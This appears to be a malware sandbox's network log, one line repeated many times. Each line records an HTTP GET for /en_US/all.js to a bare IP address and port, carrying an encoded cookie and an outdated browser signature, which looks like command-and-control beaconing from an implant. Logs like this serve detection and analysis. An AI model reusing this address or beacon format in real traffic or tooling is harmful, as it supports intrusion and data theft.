Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
